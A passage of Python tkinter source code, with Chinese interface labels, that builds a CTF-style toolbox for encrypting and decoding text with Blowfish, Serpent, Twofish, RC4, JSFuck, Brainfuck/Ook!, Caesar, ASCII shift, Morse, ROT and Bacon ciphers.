print('因为 tkinter 性能瓶颈,不宜在 tkinter 窗口展示,请使用算法在别的IDE内实现')
print('---------------------------------------------------')
print(en[:limitnum])
else:
print(en)
except:
print(traceback.format_exc())
def _blowfish_decode(*a):
encd = f1001_fent1.get().strip()
mode = f1001_mode2.get().strip()
eout = f1001_mode1.get().strip()
key = f1001_ent1.get().strip().encode(encd)
iv = f1002_ent2.get().strip().encode(encd)
data = ftxt.get(0.,tkinter.END).strip('\n').encode(encd)
ftxt.delete(0.,tkinter.END)
try:
from . import pyblowfish
except:
import pyblowfish
if eout == 'b16':_encode = base64.b16encode; _decode = base64.b16decode
if eout == 'b32':_encode = base64.b32encode; _decode = base64.b32decode
if eout == 'b64':_encode = base64.b64encode; _decode = base64.b64decode
if eout == 'b85':_encode = base64.b85encode; _decode = base64.b85decode
try:
dc = pyblowfish.decrypt(key, data, iv, mode, defunc=_decode).decode(encd)
print(dc)
except:
print(traceback.format_exc())
def _blowfish_code(*a):
try:
from . import pyblowfish
except:
import pyblowfish
ftxt.delete(0.,tkinter.END)
with open(pyblowfish.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
Button(f1002, text='[算法]',command=_blowfish_code,width=5).pack(side=tkinter.RIGHT)
Button(f1002, text='解密',command=_blowfish_decode,width=5).pack(side=tkinter.RIGHT)
Button(f1002, text='加密',command=_blowfish_encode,width=5).pack(side=tkinter.RIGHT)
# 这里是 serpent 算法的部分
def f200_change_cbit_1(*content):
if content:
encd = f2001_fent1.get().strip()
blen = len(content[0].encode(encd))*8
f2001_cbit1['text'] = str(blen)+'bit'
return True
def f200_change_cbit_2(*content):
if content:
encd = f2001_fent1.get().strip()
blen = len(content[0].encode(encd))*8
f2002_cbit2['text'] = str(blen)+'bit'
return True
f200_change_cbit1 = root.register(f200_change_cbit_1)
f200_change_cbit2 = root.register(f200_change_cbit_2)
f2000 = Frame(ff0)
f2000.pack(side=tkinter.TOP,fill=tkinter.X)
Label(f2000, text=' 以下算法为 Serpent 加解密算法 [密码长度区间:32-256bit] [iv长度需注意:128bit]。').pack(fill=tkinter.X,expand=True)
f2001 = Frame(ff0)
f2001.pack(side=tkinter.TOP,fill=tkinter.X)
Label(f2001, text='密码',width=4).pack(side=tkinter.LEFT,padx=2)
f2001_ent1 = Entry(f2001,width=17,validate='key',validatecommand=(f200_change_cbit1, '%P'))
f2001_ent1.pack(side=tkinter.LEFT)
f2001_ent1.bind('<Key>', f200_change_cbit1)
f2001_cbit1 = Label(f2001, text='0bit',width=6)
f2001_cbit1.pack(side=tkinter.LEFT,padx=6)
f2001_mode1 = Combobox(f2001,width=4,state='readonly')
f2001_mode1['values'] = ['b16','b32','b64','b85']
f2001_mode1.current(2)
f2001_mode1.pack(side=tkinter.RIGHT)
Label(f2001, text='编码',width=4).pack(side=tkinter.RIGHT,padx=5)
def _f200swich_encd1(*a):
s = f2001_fent1.get().strip()
if s == 'utf-8':
f2001_fent1.delete(0,tkinter.END)
f2001_fent1.insert(0,'gbk')
elif s == 'gbk':
f2001_fent1.delete(0,tkinter.END)
f2001_fent1.insert(0,'utf-8')
else:
f2001_fent1.delete(0,tkinter.END)
f2001_fent1.insert(0,'utf-8')
f200_change_cbit_1(f2001_ent1.get().strip())
f200_change_cbit_2(f2002_ent2.get().strip())
f2001_fent1 = Entry(f2001,width=5)
f2001_fent1.insert(0,'utf-8')
f2001_fent1.pack(side=tkinter.RIGHT)
Button(f2001, text='密码/iv/数据编码格式',command=_f200swich_encd1).pack(side=tkinter.RIGHT)
f2001_mode2 = Combobox(f2001,width=4,state='readonly')
f2001_mode2['values'] = ['cbc', 'ecb',]
f2001_mode2.current(0)
f2001_mode2.pack(side=tkinter.RIGHT)
Label(f2001, text='模式',width=4).pack(side=tkinter.RIGHT,padx=5)
f2002 = Frame(ff0)
f2002.pack(side=tkinter.TOP,fill=tkinter.X)
Label(f2002, text='iv',width=4).pack(side=tkinter.LEFT,padx=2)
f2002_ent2 = Entry(f2002,width=17,validate='key',validatecommand=(f200_change_cbit2, '%P'))
f2002_ent2.pack(side=tkinter.LEFT)
f2002_cbit2 = Label(f2002, text='128:bit',width=6)
f2002_cbit2.pack(side=tkinter.LEFT,padx=6)
f2002_ent2.insert(0,'1234567890123456')
Label(f2002, text='ecb模式:iv无效;ctr模式:iv长度不限制',).pack(side=tkinter.LEFT,padx=6)
def _serpent_encode(*a):
encd = f2001_fent1.get().strip()
mode = f2001_mode2.get().strip()
eout = f2001_mode1.get().strip()
key = f2001_ent1.get().strip().encode(encd)
iv = f2002_ent2.get().strip().encode(encd)
data = ftxt.get(0.,tkinter.END).strip('\n').encode(encd)
limitnum = int(entlimit.get().strip())
ftxt.delete(0.,tkinter.END)
try:
from . import pyserpent
except:
import pyserpent
if eout == 'b16':_encode = base64.b16encode; _decode = base64.b16decode
if eout == 'b32':_encode = base64.b32encode; _decode = base64.b32decode
if eout == 'b64':_encode = base64.b64encode; _decode = base64.b64decode
if eout == 'b85':_encode = base64.b85encode; _decode = base64.b85decode
try:
en = pyserpent.serpent_encrypt(key, data, iv=iv, mode=mode, enfunc=_encode).decode(encd)
if len(en) > limitnum:
print('警告!')
print('加密数据长度({})过长(超过{}字符,超过的部分不显示)'.format(len(en),limitnum))
print('因为 tkinter 性能瓶颈,不宜在 tkinter 窗口展示,请使用算法在别的IDE内实现')
print('---------------------------------------------------')
print(en[:limitnum])
else:
print(en)
except:
print(traceback.format_exc())
def _serpent_decode(*a):
encd = f2001_fent1.get().strip()
mode = f2001_mode2.get().strip()
eout = f2001_mode1.get().strip()
key = f2001_ent1.get().strip().encode(encd)
iv = f2002_ent2.get().strip().encode(encd)
data = ftxt.get(0.,tkinter.END).strip('\n').encode(encd)
ftxt.delete(0.,tkinter.END)
try:
from . import pyserpent
except:
import pyserpent
if eout == 'b16':_encode = base64.b16encode; _decode = base64.b16decode
if eout == 'b32':_encode = base64.b32encode; _decode = base64.b32decode
if eout == 'b64':_encode = base64.b64encode; _decode = base64.b64decode
if eout == 'b85':_encode = base64.b85encode; _decode = base64.b85decode
try:
dc = pyserpent.serpent_decrypt(key, data, iv=iv, mode=mode, defunc=_decode).decode(encd)
print(dc)
except:
print(traceback.format_exc())
def _serpent_code(*a):
try:
from . import pyserpent
except:
import pyserpent
ftxt.delete(0.,tkinter.END)
with open(pyserpent.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
Button(f2002, text='[算法]',command=_serpent_code,width=5).pack(side=tkinter.RIGHT)
Button(f2002, text='解密',command=_serpent_decode,width=5).pack(side=tkinter.RIGHT)
Button(f2002, text='加密',command=_serpent_encode,width=5).pack(side=tkinter.RIGHT)
# 这里是 twofish 算法的部分
def f300_change_cbit_1(*content):
if content:
encd = f3001_fent1.get().strip()
blen = len(content[0].encode(encd))*8
f3001_cbit1['text'] = str(blen)+'bit'
return True
def f300_change_cbit_2(*content):
if content:
encd = f3001_fent1.get().strip()
blen = len(content[0].encode(encd))*8
f3002_cbit2['text'] = str(blen)+'bit'
return True
f300_change_cbit1 = root.register(f300_change_cbit_1)
f300_change_cbit2 = root.register(f300_change_cbit_2)
f3000 = Frame(ff0)
f3000.pack(side=tkinter.TOP,fill=tkinter.X)
Label(f3000, text=' 以下算法为 Twofish 加解密算法 [密码长度需注意:128bit,192bit,256bit] [iv长度需注意:128bit]。').pack(fill=tkinter.X,expand=True)
f3001 = Frame(ff0)
f3001.pack(side=tkinter.TOP,fill=tkinter.X)
Label(f3001, text='密码',width=4).pack(side=tkinter.LEFT,padx=2)
f3001_ent1 = Entry(f3001,width=17,validate='key',validatecommand=(f300_change_cbit1, '%P'))
f3001_ent1.pack(side=tkinter.LEFT)
f3001_ent1.bind('<Key>', f300_change_cbit1)
f3001_cbit1 = Label(f3001, text='0bit',width=6)
f3001_cbit1.pack(side=tkinter.LEFT,padx=6)
f3001_mode1 = Combobox(f3001,width=4,state='readonly')
f3001_mode1['values'] = ['b16','b32','b64','b85']
f3001_mode1.current(2)
f3001_mode1.pack(side=tkinter.RIGHT)
Label(f3001, text='编码',width=4).pack(side=tkinter.RIGHT,padx=5)
def _f300swich_encd1(*a):
s = f3001_fent1.get().strip()
if s == 'utf-8':
f3001_fent1.delete(0,tkinter.END)
f3001_fent1.insert(0,'gbk')
elif s == 'gbk':
f3001_fent1.delete(0,tkinter.END)
f3001_fent1.insert(0,'utf-8')
else:
f3001_fent1.delete(0,tkinter.END)
f3001_fent1.insert(0,'utf-8')
f300_change_cbit_1(f3001_ent1.get().strip())
f300_change_cbit_2(f3002_ent2.get().strip())
f3001_fent1 = Entry(f3001,width=5)
f3001_fent1.insert(0,'utf-8')
f3001_fent1.pack(side=tkinter.RIGHT)
Button(f3001, text='密码/iv/数据编码格式',command=_f300swich_encd1).pack(side=tkinter.RIGHT)
f3001_mode2 = Combobox(f3001,width=4,state='readonly')
f3001_mode2['values'] = ['cbc', 'ecb',]
f3001_mode2.current(0)
f3001_mode2.pack(side=tkinter.RIGHT)
Label(f3001, text='模式',width=4).pack(side=tkinter.RIGHT,padx=5)
f3002 = Frame(ff0)
f3002.pack(side=tkinter.TOP,fill=tkinter.X)
Label(f3002, text='iv',width=4).pack(side=tkinter.LEFT,padx=2)
f3002_ent2 = Entry(f3002,width=17,validate='key',validatecommand=(f300_change_cbit2, '%P'))
f3002_ent2.pack(side=tkinter.LEFT)
f3002_cbit2 = Label(f3002, text='128:bit',width=6)
f3002_cbit2.pack(side=tkinter.LEFT,padx=6)
f3002_ent2.insert(0,'1234567890123456')
Label(f3002, text='ecb模式:iv无效;ctr模式:iv长度不限制',).pack(side=tkinter.LEFT,padx=6)
def _twofish_encode(*a):
encd = f3001_fent1.get().strip()
mode = f3001_mode2.get().strip()
eout = f3001_mode1.get().strip()
key = f3001_ent1.get().strip().encode(encd)
iv = f3002_ent2.get().strip().encode(encd)
data = ftxt.get(0.,tkinter.END).strip('\n').encode(encd)
limitnum = int(entlimit.get().strip())
ftxt.delete(0.,tkinter.END)
try:
from . import pytwofish
except:
import pytwofish
if eout == 'b16':_encode = base64.b16encode; _decode = base64.b16decode
if eout == 'b32':_encode = base64.b32encode; _decode = base64.b32decode
if eout == 'b64':_encode = base64.b64encode; _decode = base64.b64decode
if eout == 'b85':_encode = base64.b85encode; _decode = base64.b85decode
try:
en = pytwofish.twofish_encrypt(key, data, iv=iv, mode=mode, enfunc=_encode).decode(encd)
if len(en) > limitnum:
print('警告!')
print('加密数据长度({})过长(超过{}字符,超过的部分不显示)'.format(len(en),limitnum))
print('因为 tkinter 性能瓶颈,不宜在 tkinter 窗口展示,请使用算法在别的IDE内实现')
print('---------------------------------------------------')
print(en[:limitnum])
else:
print(en)
except:
print(traceback.format_exc())
def _twofish_decode(*a):
encd = f3001_fent1.get().strip()
mode = f3001_mode2.get().strip()
eout = f3001_mode1.get().strip()
key = f3001_ent1.get().strip().encode(encd)
iv = f3002_ent2.get().strip().encode(encd)
data = ftxt.get(0.,tkinter.END).strip('\n').encode(encd)
ftxt.delete(0.,tkinter.END)
try:
from . import pytwofish
except:
import pytwofish
if eout == 'b16':_encode = base64.b16encode; _decode = base64.b16decode
if eout == 'b32':_encode = base64.b32encode; _decode = base64.b32decode
if eout == 'b64':_encode = base64.b64encode; _decode = base64.b64decode
if eout == 'b85':_encode = base64.b85encode; _decode = base64.b85decode
try:
dc = pytwofish.twofish_decrypt(key, data, iv=iv, mode=mode, defunc=_decode).decode(encd)
print(dc)
except:
print(traceback.format_exc())
def _twofish_code(*a):
try:
from . import pytwofish
except:
import pytwofish
ftxt.delete(0.,tkinter.END)
with open(pytwofish.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
Button(f3002, text='[算法]',command=_twofish_code,width=5).pack(side=tkinter.RIGHT)
Button(f3002, text='解密',command=_twofish_decode,width=5).pack(side=tkinter.RIGHT)
Button(f3002, text='加密',command=_twofish_encode,width=5).pack(side=tkinter.RIGHT)
f200 = Frame(ff0)
f200.pack(side=tkinter.TOP,fill=tkinter.X)
f201 = Frame(f200)
f202 = Frame(f200)
f201.pack(side=tkinter.TOP,fill=tkinter.X)
f202.pack(side=tkinter.TOP,fill=tkinter.X)
Label(f201, text=' 以下算法为 rc4 解密算法').pack(fill=tkinter.X,expand=True)
def _rc4_encode(*a):
data = ftxt.get(0.,tkinter.END).strip('\n')
ftxt.delete(0.,tkinter.END)
encd = k201.get().strip('\n')
key = k200.get().strip('\n').encode(encd)
data = data.encode(encd)
mode = cbx201.get().strip()
try:
from . import pyrc4
except:
import pyrc4
if mode == 'b16':_encode = base64.b16encode; _decode = base64.b16decode
if mode == 'b32':_encode = base64.b32encode; _decode = base64.b32decode
if mode == 'b64':_encode = base64.b64encode; _decode = base64.b64decode
if mode == 'b85':_encode = base64.b85encode; _decode = base64.b85decode
try:
f = pyrc4.rc4(data, key, mode="encode", enfunc=_encode, defunc=_decode)
print(f.decode(encd))
except:
ftxt.delete(0.,tkinter.END)
print(traceback.format_exc())
print('error encoding!!! check input data.')
def _rc4_decode(*a):
data = ftxt.get(0.,tkinter.END).strip('\n')
ftxt.delete(0.,tkinter.END)
encd = k201.get().strip('\n')
key = k200.get().strip('\n').encode(encd)
data = data.encode(encd)
mode = cbx201.get().strip()
try:
from . import pyrc4
except:
import pyrc4
if mode == 'b16':_encode = base64.b16encode; _decode = base64.b16decode
if mode == 'b32':_encode = base64.b32encode; _decode = base64.b32decode
if mode == 'b64':_encode = base64.b64encode; _decode = base64.b64decode
if mode == 'b85':_encode = base64.b85encode; _decode = base64.b85decode
try:
f = pyrc4.rc4(data, key, mode="decode", enfunc=_encode, defunc=_decode)
print(f.decode(encd))
except:
ftxt.delete(0.,tkinter.END)
print(traceback.format_exc())
print('error decoding!!! check input data.')
def _rc4_code(*a):
try:
from . import pyrc4
except:
import pyrc4
ftxt.delete(0.,tkinter.END)
with open(pyrc4.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
def _swich_rc4_encd(*a):
s = k201.get().strip()
if s == 'utf-8':
k201.delete(0,tkinter.END)
k201.insert(0,'gbk')
elif s == 'gbk':
k201.delete(0,tkinter.END)
k201.insert(0,'utf-8')
else:
k201.delete(0,tkinter.END)
k201.insert(0,'utf-8')
cbx201 = Combobox(f202,width=4,state='readonly')
cbx201['values'] = ['b16','b32','b64','b85']
cbx201.current(2)
cbx201.pack(side=tkinter.RIGHT)
Label(f202, text='密码',width=4).pack(side=tkinter.LEFT,padx=5)
k200 = Entry(f202, width=17)
k200.pack(side=tkinter.LEFT)
Button(f202, text='[算法]',command=_rc4_code,width=5).pack(side=tkinter.RIGHT)
Button(f202, text='解密',command=_rc4_decode,width=5).pack(side=tkinter.RIGHT)
Button(f202, text='加密',command=_rc4_encode,width=5).pack(side=tkinter.RIGHT)
k201 = Entry(f202, width=5)
k201.pack(side=tkinter.RIGHT)
k201.insert(0,'utf-8')
Button(f202, text='密码/数据编码格式',command=_swich_rc4_encd).pack(side=tkinter.RIGHT)
# jsfuck 的解密
fxpy0010 = Frame(ff0)
fxpy0010.pack(side=tkinter.TOP,fill=tkinter.X)
fxpy0012 = Frame(fxpy0010)
fxpy0012.pack(side=tkinter.TOP,fill=tkinter.X)
def _jsfuck_decode(*a):
data = ftxt.get(0.,tkinter.END).strip('\n')
ftxt.delete(0.,tkinter.END)
try:
from . import pyjsfuck
except:
import pyjsfuck
try:
if cbxejsfuck.get().strip() == '显示解密过程':
debuglevel = 1
else:
debuglevel = 0
f = pyjsfuck.unjsfuck(data, debuglevel=debuglevel, logger=print)
print()
print('[ result ]:')
print(f)
except:
ftxt.delete(0.,tkinter.END)
print(traceback.format_exc())
print('error decoding!!! check input data.')
def _jsfuck_code(*a):
try:
from . import pyjsfuck
except:
import pyjsfuck
ftxt.delete(0.,tkinter.END)
with open(pyjsfuck.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
Button(fxpy0012, text='[算法]',command=_jsfuck_code,width=5).pack(side=tkinter.LEFT)
Label(fxpy0012, text=' 这里为 jsfuck 算法解密。').pack(side=tkinter.LEFT)
Button(fxpy0012, text='解密',command=_jsfuck_decode,width=5).pack(side=tkinter.RIGHT)
cbxejsfuck = Combobox(fxpy0012,width=11,state='readonly')
cbxejsfuck['values'] = ['显示解密过程', '不显示过程']
cbxejsfuck.current(0)
cbxejsfuck.pack(fill=tkinter.X,side=tkinter.RIGHT)
# brainfuck 的解密
fxpy0070 = Frame(ff0)
fxpy0070.pack(side=tkinter.TOP,fill=tkinter.X)
fxpy0072 = Frame(fxpy0070)
fxpy0072.pack(side=tkinter.TOP,fill=tkinter.X)
def _brainfuck_decode(*a):
data = ftxt.get(0.,tkinter.END).strip('\n')
ftxt.delete(0.,tkinter.END)
try:
from . import pybrainfuck
except:
import pybrainfuck
try:
v = pybrainfuck.evaluate(data)
print(v)
except:
ftxt.delete(0.,tkinter.END)
print(traceback.format_exc())
print('error decoding!!! check input data.')
def _brainfuck_code(*a):
try:
from . import pybrainfuck
except:
import pybrainfuck
ftxt.delete(0.,tkinter.END)
with open(pybrainfuck.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
Button(fxpy0072, text='[算法]',command=_brainfuck_code,width=5).pack(side=tkinter.LEFT)
Label(fxpy0072, text=' 这里为 brainfuck 算法解密。').pack(side=tkinter.LEFT)
Button(fxpy0072, text='brainfuck解密',command=_brainfuck_decode,width=12).pack(side=tkinter.RIGHT)
# ook 的解密
fxpy0080 = Frame(ff0)
fxpy0080.pack(side=tkinter.TOP,fill=tkinter.X)
fxpy0082 = Frame(fxpy0080)
fxpy0082.pack(side=tkinter.TOP,fill=tkinter.X)
def _brainfuckook_decode(*a):
data = ftxt.get(0.,tkinter.END).strip('\n')
a = brainfuckook_a.get().strip()
b = brainfuckook_b.get().strip()
c = brainfuckook_c.get().strip()
ftxt.delete(0.,tkinter.END)
try:
from . import pybrainfuck
except:
import pybrainfuck
try:
data = pybrainfuck.parse_ook_to_brainfuckmap(data, abc = (a,b,c))
v = pybrainfuck.evaluate(data)
print(v)
except:
ftxt.delete(0.,tkinter.END)
print(traceback.format_exc())
print('error decoding!!! check input data.')
def _brainfuck_code(*a):
try:
from . import pybrainfuck
except:
import pybrainfuck
ftxt.delete(0.,tkinter.END)
with open(pybrainfuck.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
Button(fxpy0082, text='[算法]',command=_brainfuck_code,width=5).pack(side=tkinter.LEFT)
Label(fxpy0082, text=' 这里为 Ook! 算法解密。').pack(side=tkinter.LEFT)
Button(fxpy0082, text='Ook!解密',command=_brainfuckook_decode,width=8).pack(side=tkinter.RIGHT)
brainfuckook_c = Entry(fxpy0082, width=2)
brainfuckook_c.insert(0, '.')
brainfuckook_c.pack(side=tkinter.RIGHT)
Label(fxpy0082, text='c').pack(side=tkinter.RIGHT)
brainfuckook_b = Entry(fxpy0082, width=2)
brainfuckook_b.insert(0, '?')
brainfuckook_b.pack(side=tkinter.RIGHT)
Label(fxpy0082, text='b').pack(side=tkinter.RIGHT)
brainfuckook_a = Entry(fxpy0082, width=2)
brainfuckook_a.insert(0, '!')
brainfuckook_a.pack(side=tkinter.RIGHT)
Label(fxpy0082, text='a').pack(side=tkinter.RIGHT)
# 凯撒解密
fxpy0020 = Frame(ff0)
fxpy0020.pack(side=tkinter.TOP,fill=tkinter.X)
fxpy0022 = Frame(fxpy0020)
fxpy0022.pack(side=tkinter.TOP,fill=tkinter.X)
def _caesar_enum(*a):
data = ftxt.get(0.,tkinter.END).strip('\n')
ftxt.delete(0.,tkinter.END)
try:
from . import pycaesar
except:
import pycaesar
try:
if len(data) > 1000:
print('注意,使用超过1000长度的的凯撒遍历处理时,请直接使用代码在 IDE 里面自行处理。')
for i in range(-13, 13, 1):
v = pycaesar.caesar(data, i)
if i == 0:print()
print('{:>3} --- {} '.format(i, v))
if i == 0:print()
except:
ftxt.delete(0.,tkinter.END)
print(traceback.format_exc())
print('error decoding!!! check input data.')
def _caesar_encode():
data = ftxt.get(0.,tkinter.END).strip('\n')
deviation = fxpy0022ent.get().strip()
ftxt.delete(0.,tkinter.END)
try:
from . import pycaesar
except:
import pycaesar
try:
deviation = int(deviation)
v = pycaesar.caesar(data, deviation)
print(v)
except:
ftxt.delete(0.,tkinter.END)
print(traceback.format_exc())
print('error decoding!!! check input data.')
def _caesar_decode():
data = ftxt.get(0.,tkinter.END).strip('\n')
deviation = fxpy0022ent.get().strip()
ftxt.delete(0.,tkinter.END)
try:
from . import pycaesar
except:
import pycaesar
try:
deviation = int(deviation)
v = pycaesar.caesar(data, -deviation)
print(v)
except:
ftxt.delete(0.,tkinter.END)
print(traceback.format_exc())
print('error decoding!!! check input data.')
def _caesar_code(*a):
try:
from . import pycaesar
except:
import pycaesar
ftxt.delete(0.,tkinter.END)
with open(pycaesar.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
Button(fxpy0022, text='[算法]',command=_caesar_code,width=5).pack(side=tkinter.LEFT)
Label(fxpy0022, text=' 这里为 凯撒密码 算法加解密。').pack(side=tkinter.LEFT)
Button(fxpy0022, text='遍历',command=_caesar_enum,width=5).pack(side=tkinter.RIGHT)
Button(fxpy0022, text='解密',command=_caesar_decode,width=5).pack(side=tkinter.RIGHT)
Button(fxpy0022, text='加密',command=_caesar_encode,width=5).pack(side=tkinter.RIGHT)
fxpy0022ent = Entry(fxpy0022, width=3)
fxpy0022ent.pack(side=tkinter.RIGHT)
fxpy0022ent.insert(0, '3')
Label(fxpy0022, text='偏移').pack(side=tkinter.RIGHT)
# ascii偏移解密
fxpy0060 = Frame(ff0)
fxpy0060.pack(side=tkinter.TOP,fill=tkinter.X)
fxpy0062 = Frame(fxpy0060)
fxpy0062.pack(side=tkinter.TOP,fill=tkinter.X)
def _caesar_enum(*a):
data = ftxt.get(0.,tkinter.END).strip('\n')
ftxt.delete(0.,tkinter.END)
try:
from . import pyascii_deviation
except:
import pyascii_deviation
try:
if len(data) > 1000:
print('注意,使用超过1000长度的的凯撒遍历处理时,请直接使用代码在 IDE 里面自行处理。')
for i in range(-20, 20, 1):
v = pyascii_deviation.ascii_deviation(data, i)
if i == 0:print()
print('{:>3} --- {} '.format(i, v))
if i == 0:print()
except:
ftxt.delete(0.,tkinter.END)
print(traceback.format_exc())
print('error decoding!!! check input data.')
def _caesar_encode():
data = ftxt.get(0.,tkinter.END).strip('\n')
deviation = fxpy0062ent.get().strip()
ftxt.delete(0.,tkinter.END)
try:
from . import pyascii_deviation
except:
import pyascii_deviation
try:
deviation = int(deviation)
v = pyascii_deviation.ascii_deviation(data, deviation)
print(v)
except:
ftxt.delete(0.,tkinter.END)
print(traceback.format_exc())
print('error decoding!!! check input data.')
def _caesar_decode():
data = ftxt.get(0.,tkinter.END).strip('\n')
deviation = fxpy0062ent.get().strip()
ftxt.delete(0.,tkinter.END)
try:
from . import pyascii_deviation
except:
import pyascii_deviation
try:
deviation = int(deviation)
v = pyascii_deviation.ascii_deviation(data, -deviation)
print(v)
except:
ftxt.delete(0.,tkinter.END)
print(traceback.format_exc())
print('error decoding!!! check input data.')
def _caesar_code(*a):
try:
from . import pyascii_deviation
except:
import pyascii_deviation
ftxt.delete(0.,tkinter.END)
with open(pyascii_deviation.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
Button(fxpy0062, text='[算法]',command=_caesar_code,width=5).pack(side=tkinter.LEFT)
Label(fxpy0062, text=' 这里为 ascii偏移 算法加解密。').pack(side=tkinter.LEFT)
Button(fxpy0062, text='遍历',command=_caesar_enum,width=5).pack(side=tkinter.RIGHT)
Button(fxpy0062, text='解密',command=_caesar_decode,width=5).pack(side=tkinter.RIGHT)
Button(fxpy0062, text='加密',command=_caesar_encode,width=5).pack(side=tkinter.RIGHT)
fxpy0062ent = Entry(fxpy0062, width=3)
fxpy0062ent.pack(side=tkinter.RIGHT)
fxpy0062ent.insert(0, '3')
Label(fxpy0062, text='偏移').pack(side=tkinter.RIGHT)
# 莫斯解密
fxpy0030 = Frame(ff0)
fxpy0030.pack(side=tkinter.TOP,fill=tkinter.X)
fxpy0032 = Frame(fxpy0030)
fxpy0032.pack(side=tkinter.TOP,fill=tkinter.X)
def _morse_encode(*a):
data = ftxt.get(0.,tkinter.END).strip('\n')
point = morse_point.get().strip()
line = morse_line.get().strip()
space = morse_space.get().strip('\n')
ftxt.delete(0.,tkinter.END)
try:
from . import pymorse
except:
import pymorse
try:
v = pymorse.morse_enc(data, point, line, space)
print(v)
except:
ftxt.delete(0.,tkinter.END)
print(traceback.format_exc())
print('error decoding!!! check input data.')
def _morse_decode(*a):
data = ftxt.get(0.,tkinter.END).strip('\n')
point = morse_point.get().strip()
line = morse_line.get().strip()
space = morse_space.get().strip('\n')
ftxt.delete(0.,tkinter.END)
try:
from . import pymorse
except:
import pymorse
try:
v = pymorse.morse_dec(data, point, line, space)
print(v)
except:
ftxt.delete(0.,tkinter.END)
print(traceback.format_exc())
print('error decoding!!! check input data.')
def _morse_code(*a):
try:
from . import pymorse
except:
import pymorse
ftxt.delete(0.,tkinter.END)
with open(pymorse.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
Button(fxpy0032, text='[算法]',command=_morse_code,width=5).pack(side=tkinter.LEFT)
Label(fxpy0032, text=' 这里为 莫斯密码 算法加解密。').pack(side=tkinter.LEFT)
Button(fxpy0032, text='解密',command=_morse_decode,width=5).pack(side=tkinter.RIGHT)
Button(fxpy0032, text='加密',command=_morse_encode,width=5).pack(side=tkinter.RIGHT)
morse_space = Entry(fxpy0032, width=2)
morse_space.insert(0, ' ')
morse_space.pack(side=tkinter.RIGHT)
Label(fxpy0032, text='空格').pack(side=tkinter.RIGHT)
morse_line = Entry(fxpy0032, width=2)
morse_line.insert(0, '-')
morse_line.pack(side=tkinter.RIGHT)
Label(fxpy0032, text='线').pack(side=tkinter.RIGHT)
morse_point = Entry(fxpy0032, width=2)
morse_point.insert(0, '.')
morse_point.pack(side=tkinter.RIGHT)
Label(fxpy0032, text='点').pack(side=tkinter.RIGHT)
# rot 加解密
fxpy0040 = Frame(ff0)
fxpy0040.pack(side=tkinter.TOP,fill=tkinter.X)
fxpy0042 = Frame(fxpy0040)
fxpy0042.pack(side=tkinter.TOP,fill=tkinter.X)
def _rots_encode_decode(*a):
data = ftxt.get(0.,tkinter.END).strip('\n')
ftxt.delete(0.,tkinter.END)
try:
from . import pyrots
except:
import pyrots
try:
if cbxrots.get().strip() == 'rot5': encdec = pyrots.rot5
if cbxrots.get().strip() == 'rot13': encdec = pyrots.rot13
if cbxrots.get().strip() == 'rot18': encdec = pyrots.rot18
if cbxrots.get().strip() == 'rot47': encdec = pyrots.rot47
v = encdec(data)
print(v)
except:
ftxt.delete(0.,tkinter.END)
print(traceback.format_exc())
print('error decoding!!! check input data.')
def _rots_encode_decode_all(*a):
data = ftxt.get(0.,tkinter.END).strip('\n')
ftxt.delete(0.,tkinter.END)
try:
from . import pyrots
except:
import pyrots
try:
v = pyrots.morse_enc(data, point, line, space)
print(v)
except:
ftxt.delete(0.,tkinter.END)
print(traceback.format_exc())
print('error decoding!!! check input data.')
def _morse_code(*a):
try:
from . import pyrots
except:
import pyrots
ftxt.delete(0.,tkinter.END)
with open(pyrots.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
Button(fxpy0042, text='[算法]',command=_morse_code,width=5).pack(side=tkinter.LEFT)
Label(fxpy0042, text=' 这里为 rot* 算法加解密。(rot18,rot47 部分加密数据的大小写无法还原)').pack(side=tkinter.LEFT)
Button(fxpy0042, text='加解密',command=_rots_encode_decode,width=5).pack(side=tkinter.RIGHT)
cbxrots = Combobox(fxpy0042,width=5,state='readonly')
cbxrots['values'] = ['rot5', 'rot13','rot18','rot47']
cbxrots.current(0)
cbxrots.pack(fill=tkinter.X,side=tkinter.RIGHT)
# 培根加解密
fxpy0050 = Frame(ff0)
fxpy0050.pack(side=tkinter.TOP,fill=tkinter.X)
fxpy0052 = Frame(fxpy0050)
fxpy0052.pack(side=tkinter.TOP,fill=tkinter.X)
def _bacon_encode(*a):
data = ftxt.get(0.,tkinter.END).strip()
a = bacon_a.get().strip()
b = bacon_b.get().strip()
ver = cbxbaconver.get().strip()
ftxt.delete(0.,tkinter.END)
try:
from . import pybacon
except:
import pybacon
try:
v = pybacon.bacon_enc(data, a, b, ver)
print(v)
except:
ftxt.delete(0.,tkinter.END)
print(traceback.format_exc())
print('error decoding!!! check input data.')
def _bacon_decode(*a):
data = ftxt.get(0.,tkinter.END).strip()
a = bacon_a.get().strip()
b = bacon_b.get().strip()
ver = cbxbaconver.get().strip()
ftxt.delete(0.,tkinter.END)
try:
from . import pybacon
except:
import pybacon
try:
v = pybacon.bacon_dec(data, a, b, ver)
print(v)
except:
ftxt.delete(0.,tkinter.END)
print(traceback.format_exc())
print('error decoding!!! check input data.')
def _bacon_code(*a):
try:
from . import pybacon
except:
import pybacon
ftxt.delete(0.,tkinter.END)
with open(pybacon.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
Button(fxpy0052, text='[算法]',command=_bacon_code,width=5).pack(side=tkinter.LEFT)
Label(fxpy0052, text=' 这里为 培根密码 算法加解密。').pack(side=tkinter.LEFT)
Button(fxpy0052, text='解密',command=_bacon_decode,width=5).pack(side=tkinter.RIGHT)
Button(fxpy0052, text='加密',command=_bacon_encode,width=5).pack(side=tkinter.RIGHT)
bacon_b = Entry(fxpy0052, width=2)
bacon_b.insert(0, 'b')
bacon_b.pack(side=tkinter.RIGHT)
Label(fxpy0052, text='b').pack(side=tkinter.RIGHT)
bacon_a = Entry(fxpy0052, width=2)
bacon_a.insert(0, 'a')
bacon_a.pack(side=tkinter.RIGHT)
